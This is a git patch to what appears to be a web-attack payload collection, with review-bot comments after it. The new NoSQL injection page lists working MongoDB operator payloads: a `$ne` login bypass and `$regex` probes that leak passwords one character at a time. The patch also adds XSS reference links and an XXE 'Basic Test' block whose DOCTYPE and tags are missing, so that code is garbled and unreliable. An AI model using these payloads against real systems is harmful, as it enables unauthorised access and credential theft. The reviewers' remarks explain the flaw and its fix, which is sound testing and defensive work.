From d0e164b6b1a080d924ff208b7aa515c3424d0206 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Sun, 30 Oct 2016 18:53:32 +0700 Subject: [PATCH] NOSQL injection added + updates XSS/XXE --- NoSQL injection/README.md | 29 +++++++++++++++++++++++++++++ XSS injection/README.md | 6 +++++- XXE files/README.md | 10 ++++++++++ 3 files changed, 44 insertions(+), 1 deletion(-) create mode 100644 NoSQL injection/README.md diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md new file mode 100644 index 0000000..1b47522 --- /dev/null +++ b/NoSQL injection/README.md @@ -0,0 +1,29 @@ +# NoSQL injection +NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. + +## Exploit + +Basic authentication bypass using not equal ($ne) +``` +username[$ne]=toto&password[$ne]=toto +``` + +Extract length information +``` +username[$ne]=toto&password[$regex]=.{1} +username[$ne]=toto&password[$regex]=.{3} +``` + +Extract data information +``` +username[$ne]=toto&password[$regex]=m.{2} +username[$ne]=toto&password[$regex]=md.{1} +username[$ne]=toto&password[$regex]=mdp + +username[$ne]=toto&password[$regex]=m.* +username[$ne]=toto&password[$regex]=md.* +``` + +## Thanks to +* https://www.dailysecurity.fr/nosql-injections-classique-blind/ +* https://www.owasp.org/index.php/Testing_for_NoSQL_injection \ No newline at end of file diff --git a/XSS injection/README.md b/XSS injection/README.md index 8dc0918..4bbb12e 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md 
@@ -242,4 +242,8 @@ Use JSFuck to encode the payload (alert()) ## Thanks to * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot -* tbm \ No newline at end of file +* tbm +* http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html +* http://www.thespanner.co.uk/2014/03/21/rpo/ +* http://blog.innerht.ml/rpo-gadgets/ +* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite \ No newline at end of file diff --git a/XXE files/README.md b/XXE files/README.md index da29ba9..1e1cd2b 100644 --- a/XXE files/README.md +++ b/XXE files/README.md @@ -3,6 +3,16 @@ An XML External Entity attack is a type of attack against an application that pa ## Exploit +Basic Test +``` + + ]> + + John + &example; + +``` + Classic XXE ```
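Review bot: In the "Extract length information" block of the new NoSQL injection/README.md, the `$regex` values `.{1}` and `.{3}` are unanchored, so each matches any password of at least that length rather than exactly that length; anchoring them as `^.{3}$` makes the probe match the heading. The section also never explains why `username[$ne]=toto` works at all: `$ne` and `$regex` are MongoDB query operators, and the bracketed parameter names are parsed server-side into a query object that is passed to the database unchanged, so the fix on the application side is to cast request values to strings or reject object-valued parameters before building the query. A one-line note to that effect, and a remark that the payloads are MongoDB-specific rather than generic "NoSQL", would make the page usable for diagnosis as well as testing. The new file also ends without a trailing newline.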
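Review bot: The four links appended to the "Thanks to" list in XSS injection/README.md (the blogspot, thespanner.co.uk, innerht.ml and detectify entries) all concern relative path overwrite (RPO), but the hunk adds no corresponding section or heading to the body, so a reader has no way to know what they are credited for; either add the RPO content these references belong to, or annotate each link with its topic. The rewritten `+* tbm` line still leaves the file without a trailing newline (`\ No newline at end of file` is reported again), so the next reference added will produce the same noisy one-line churn.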
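Review bot: The "Basic Test" block added to XXE files/README.md is not a working test as shown: the lines preceding `]>` are empty, so there is no document type declaration defining the `example` entity that `&example;` refers to, and the element tags around `John` are missing; a parser will fail on an undefined entity rather than demonstrate entity expansion. Please restore the declaration and enclosing element lines, and state what the test is meant to establish (that the parser resolves entities at all, which is the prerequisite for the "Classic XXE" case that follows), so the block stands on its own.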